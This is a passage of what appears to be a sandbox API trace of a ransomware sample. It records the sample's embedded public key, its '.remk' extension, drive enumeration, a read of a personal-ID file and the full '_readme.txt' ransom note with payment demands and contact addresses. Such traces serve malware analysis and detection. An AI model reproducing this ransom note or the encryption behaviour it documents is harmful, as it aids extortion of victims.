KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" [0226.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c4098 | out: hHeap=0x630000) returned 1 [0226.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x7116f8 [0226.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x28) returned 0x31ec250 [0226.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e24e0 [0226.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e2748 [0226.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e29b0 [0226.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e2c18 [0226.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e2e80 [0226.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e30e8 [0226.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e3350 [0226.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e35b8 [0226.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e3820 [0226.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e3a88 [0226.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x816) returned 0x31c3a98 [0226.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d2a8, cbMultiByte=-1, lpWideCharStr=0x31c3a98, cchWideChar=1035 | out: lpWideCharStr="_readme.txt") returned 12 [0226.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x31d1fc8 [0226.187] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c3a98 | out: hHeap=0x630000) returned 1 [0226.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x28) returned 0x31ec580 [0226.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e3cf0 [0226.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e3f58 [0226.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e7330 [0226.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e7598 [0226.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e7800 [0226.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e7a68 [0226.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e7cd0 [0226.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e7f38 [0226.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e81a0 [0226.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e8408 [0226.188] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x68c588 [0226.188] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x130) returned 0x3199068 [0226.188] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68c588 | out: hHeap=0x630000) returned 1 [0226.188] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1d0) returned 0x31b2778 [0226.188] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3199068 | out: hHeap=0x630000) returned 1 [0226.188] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2b7) returned 0x31c3070 [0226.188] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b2778 | out: hHeap=0x630000) returned 1 [0226.188] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x412) returned 0x31c3a98 [0226.188] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c3070 | out: hHeap=0x630000) returned 1 [0226.188] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x61a) returned 0x31c3eb8 [0226.188] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c3a98 | out: hHeap=0x630000) returned 1 [0226.188] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x440) returned 0x31c3070 [0226.188] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1064) returned 0x31d27f0 [0226.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31c3070, cbMultiByte=-1, lpWideCharStr=0x31d27f0, cchWideChar=2098 | out: lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned 1075 [0226.188] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1070) returned 0x31d3860 [0226.188] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d27f0 | out: hHeap=0x630000) returned 1 [0226.188] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c3070 | out: hHeap=0x630000) returned 1 [0226.188] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x28) returned 0x31ec400 [0226.188] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e8670 [0226.188] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e88d8 [0226.188] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e8b40 [0226.188] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e8da8 [0226.188] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e9010 [0226.188] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e9278 [0226.188] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e94e0 [0226.188] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e9748 [0226.188] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e99b0 [0226.189] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e9c18 [0226.189] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80a) returned 0x31d48d8 [0226.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d2a8, cbMultiByte=-1, lpWideCharStr=0x31d48d8, cchWideChar=1029 | out: lpWideCharStr=".remk") returned 6 [0226.189] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x31d27f0 [0226.189] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d48d8 | out: hHeap=0x630000) returned 1 [0226.189] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31b4ce8 [0226.189] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x653498 [0226.189] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5180 [0226.189] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x69c408 [0226.189] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x653498 | out: hHeap=0x630000) returned 1 [0226.189] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711690 [0226.189] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x48) returned 0x31dffa0 [0226.189] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69c408 | out: hHeap=0x630000) returned 1 [0226.189] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b6de8 [0226.189] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711760 [0226.189] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31dffa0 | out: hHeap=0x630000) returned 1 [0226.189] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b51d8 [0226.189] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e3a0 [0226.189] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711760 | out: hHeap=0x630000) returned 1 [0226.189] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5230 [0226.189] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b6e30 [0226.189] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd8) returned 0x3165808 [0226.189] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e3a0 | out: hHeap=0x630000) returned 1 [0226.189] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31b4658 [0226.189] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5288 [0226.190] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711760 [0226.190] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x138) returned 0x3199068 [0226.190] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3165808 | out: hHeap=0x630000) returned 1 [0226.190] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b6e78 [0226.190] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b52e0 [0226.190] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5338 [0226.190] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b6ec0 [0226.190] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1c8) returned 0x31b2778 [0226.190] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3199068 | out: hHeap=0x630000) returned 1 [0226.190] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b4ce8 | out: hHeap=0x630000) returned 1 [0226.190] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5180 | out: hHeap=0x630000) returned 1 [0226.190] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711690 | out: hHeap=0x630000) returned 1 [0226.190] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6de8 | out: hHeap=0x630000) returned 1 [0226.190] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b51d8 | out: hHeap=0x630000) returned 1 [0226.190] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5230 | out: hHeap=0x630000) returned 1 [0226.190] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6e30 | out: hHeap=0x630000) returned 1 [0226.190] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b4658 | out: hHeap=0x630000) returned 1 [0226.190] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5288 | out: hHeap=0x630000) returned 1 [0226.190] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711760 | out: hHeap=0x630000) returned 1 [0226.190] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6e78 | out: hHeap=0x630000) returned 1 [0226.190] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b52e0 | out: hHeap=0x630000) returned 1 [0226.190] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5338 | out: hHeap=0x630000) returned 1 [0226.190] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6ec0 | out: hHeap=0x630000) returned 1 [0226.190] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b2778 | out: hHeap=0x630000) returned 1 [0226.190] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x28) returned 0x31ec5e0 [0226.190] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e9e80 [0226.190] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31ea0e8 [0226.191] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31ea350 [0226.191] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31ea5b8 [0226.191] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31ea820 [0226.191] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31eaa88 [0226.191] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31eacf0 [0226.191] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31eaf58 [0226.191] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e4330 [0226.191] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e4598 [0226.191] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x68c588 [0226.191] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x130) returned 0x3199068 [0226.191] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68c588 | out: hHeap=0x630000) returned 1 [0226.191] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1d0) returned 0x31b2778 [0226.191] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3199068 | out: hHeap=0x630000) returned 1 [0226.191] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2b7) returned 0x31c44e0 [0226.191] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b2778 | out: hHeap=0x630000) returned 1 [0226.191] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x412) returned 0x31c3a98 [0226.191] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c44e0 | out: hHeap=0x630000) returned 1 [0226.191] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x61a) returned 0x31d3008 [0226.191] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c3a98 | out: hHeap=0x630000) returned 1 [0226.191] GetUserNameW (in: lpBuffer=0x18d4a8, pcbBuffer=0x18d31c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18d31c) returned 1 [0226.195] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x590) returned 0x31c3070 [0226.195] GetLastError () returned 0x0 [0226.209] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d010, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5bc [0226.210] GetFileType (hFile=0x5bc) returned 0x1 [0226.210] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1000) returned 0x31fc7c0 [0226.210] ReadFile (in: hFile=0x5bc, lpBuffer=0x31fc7c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d078, lpOverlapped=0x0 | out: lpBuffer=0x31fc7c0*, lpNumberOfBytesRead=0x18d078*=0x2a, lpOverlapped=0x0) returned 1 [0226.212] GetLastError () returned 0x0 [0226.212] ReadFile (in: hFile=0x5bc, lpBuffer=0x31fc7c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d078, lpOverlapped=0x0 | out: lpBuffer=0x31fc7c0*, lpNumberOfBytesRead=0x18d078*=0x0, lpOverlapped=0x0) returned 1 [0226.212] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31fc7c0 | out: hHeap=0x630000) returned 1 [0226.212] CloseHandle (hObject=0x5bc) returned 1 [0226.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7117c8 | out: hHeap=0x630000) returned 1 [0226.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x653498 | out: hHeap=0x630000) returned 1 [0226.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711690 | out: hHeap=0x630000) returned 1 [0226.227] CreateFileW (lpFileName="I:\\5d2860c89d774.jpg" (normalized: "i:\\5d2860c89d774.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0226.227] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0226.227] RegisterClassExW (param_1=0x18d288) returned 0xc11d [0226.228] CreateWindowExW (dwExStyle=0x0, lpClassName="LPCWSTRszWindowClass", lpWindowName="LPCWSTRszTitle", dwStyle=0xcf0000, X=-2147483648, Y=0, nWidth=-2147483648, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x2014e [0226.254] NtdllDefWindowProc_W () returned 0x0 [0226.255] NtdllDefWindowProc_W () returned 0x1 [0226.257] NtdllDefWindowProc_W () returned 0x0 [0226.261] NtdllDefWindowProc_W () returned 0x0 [0226.261] ShowWindow (hWnd=0x2014e, nCmdShow=0) returned 0 [0226.261] UpdateWindow (hWnd=0x2014e) returned 1 [0226.261] GetLogicalDrives () returned 0x4 [0226.262] SetErrorMode (uMode=0x1) returned 0x0 [0226.262] PathFileExistsA (pszPath="C:\\") returned 1 [0226.262] SetErrorMode (uMode=0x0) returned 0x1 [0226.262] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0226.262] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x806) returned 0x31fc7c0 [0226.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d240, cbMultiByte=-1, lpWideCharStr=0x31fc7c0, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0226.262] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x31fcfd0 [0226.262] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31fc7c0 | out: hHeap=0x630000) returned 1 [0226.262] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x653498 [0226.262] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31fcfd0 | out: hHeap=0x630000) returned 1 [0226.263] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x653498 | out: hHeap=0x630000) returned 1 [0226.263] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x653498 [0226.263] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31cadc8 [0226.263] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8ec) returned 0x31fc7c0 [0226.263] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x31fd0b8 [0226.263] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x321ad88 [0226.263] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1070) returned 0x31bdfc8 [0226.263] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711690 [0226.263] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x31fd8d0 [0226.263] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x660) returned 0x31fe0e8 [0226.263] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x3229ef8 [0226.264] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x322a780 [0226.264] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x322b008 [0226.264] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x322b890 [0226.264] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x322c118 [0226.264] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x31bf040 [0226.264] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x322c9a0 [0226.264] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x322d228 [0226.264] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x31bf888 [0226.264] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x31c00d0 [0226.264] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x3239ee0 [0226.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x322dab0 [0226.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x322e338 [0226.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x323a748 [0226.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x323af90 [0226.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x322ebc0 [0226.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x322f448 [0226.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x322fcd0 [0226.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x3230558 [0226.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x3230de0 [0226.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x3231668 [0226.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x3231ef0 [0226.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x3232778 [0226.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x3233000 [0226.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x3233888 [0226.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x323b7d8 [0226.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x323c040 [0226.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x3234110 [0226.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x3234998 [0226.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x3235220 [0226.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x323c8a8 [0226.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x323d0f0 [0226.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x3235aa8 [0226.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x3236330 [0226.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x3236bb8 [0226.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x3237440 [0226.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x3237cc8 [0226.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x3238550 [0226.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x3238dd8 [0226.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x323d950 [0226.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x323e1d8 [0226.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x324d938 [0226.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x324e1a0 [0226.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x323ea60 [0226.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x323f2e8 [0226.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x323fb70 [0226.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x324ea08 [0226.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x32403f8 [0226.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x3240c80 [0226.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x3241508 [0226.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x3241d90 [0226.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x3242618 [0226.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x3242ea0 [0226.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x3243728 [0226.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x3243fb0 [0226.268] 